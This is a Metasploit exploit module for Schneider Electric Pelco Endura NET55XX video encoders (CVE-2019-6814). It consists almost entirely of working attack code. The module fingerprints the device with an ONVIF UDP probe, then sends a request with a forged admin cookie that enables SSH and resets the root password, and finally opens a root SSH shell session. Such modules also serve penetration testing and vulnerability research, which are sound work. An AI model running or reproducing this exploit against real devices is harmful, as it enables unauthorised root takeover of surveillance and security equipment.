Schneider Electric Pelco Endura NET55XX Encoder

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Udp  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::SSH  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Schneider Electric Pelco Endura NET55XX Encoder",  
'Description' => %q(  
This module exploits inadequate access controls within the webUI to enable  
the SSH service and change the root password. This module has been tested successfully  
on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.  
),  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Lucas Dinucci <[email protected]>',  
'Vitor Esperança <[email protected]>'  
],  
'References' =>  
[  
['CVE', '2019-6814'],  
['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']  
],  
'Payload' =>  
{  
'Compat' => {  
'PayloadType' => 'cmd_interact',  
'ConnectionType' => 'find'  
}  
},  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [ [ "Universal", {} ] ],  
'Privileged' => true,  
'DisclosureDate' => "Jan 25 2019",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),  
OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])  
]  
)  
  
register_advanced_options(  
[  
OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),  
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),  
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])  
]  
)  
end  
  
def new_password  
datastore['NEW_PASSWORD']  
end  
  
def check  
xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\  
'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\  
'<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\  
'<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\  
'<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\  
'<a:ReplyTo>'\  
'<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\  
'</a:ReplyTo>'\  
'<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\  
'</Header>'\  
'<Body>'\  
'<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\  
'<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\  
'</Probe>'\  
'</Body>'\  
'</Envelope><?xml version="1.0" encoding="UTF-8"?>'  
  
connect_udp(true, {'RPORT' => datastore['UDP_PORT']})  
udp_sock.put(xmlPayload)  
resp = []  
resp << udp_sock.get(datastore['TIMEOUT'])  
xmlResponse = resp.join(',')  
disconnect_udp  
if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")  
return Exploit::CheckCode::Appears  
end  
CheckCode::Safe  
end  
  
def change_password  
print_status("#{peer} - Attempt to change the root password...")  
post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json  
  
login = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),  
'data' => post,  
'headers' =>  
{  
'Cookie' => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',  
'Content-Type' => 'application/json;charset=utf-8'  
}  
}, timeout=datastore['TIMEOUT'])  
  
fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200  
print_good("#{rhost}:80 - Successfully changed the root password...")  
print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")  
end  
  
def do_login  
change_password  
print_status("#{rhost}:22 - Attempt to start a SSH connection...")  
factory = ssh_socket_factory  
opts = {  
:auth_methods => ['password', 'keyboard-interactive'],  
:port => 22,  
:use_agent => false,  
:config => true,  
:password => new_password,  
:proxy => factory,  
:non_interactive => true,  
:verify_host_key => :never  
}  
opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']  
begin  
ssh = nil  
::Timeout.timeout(datastore['SSH_TIMEOUT']) do  
ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)  
end  
rescue Rex::ConnectionError  
rescue Net::SSH::Disconnect, ::EOFError  
print_error "#{rhost}:22 SSH - Disconnected during negotiation"  
rescue ::Timeout::Error  
print_error "#{rhost}:22 SSH - Timed out during negotiation"  
rescue Net::SSH::AuthenticationFailed  
print_error "#{rhost}:22 SSH - Failed authentication"  
rescue Net::SSH::Exception => e  
print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"  
end  
if ssh  
conn = Net::SSH::CommandStream.new(ssh)  
return conn  
end  
end  
  
def exploit  
conn = do_login  
if conn  
print_good("#{rhost}:22 - Session established ")  
handler(conn.lsock)  
end  
end  
end  
`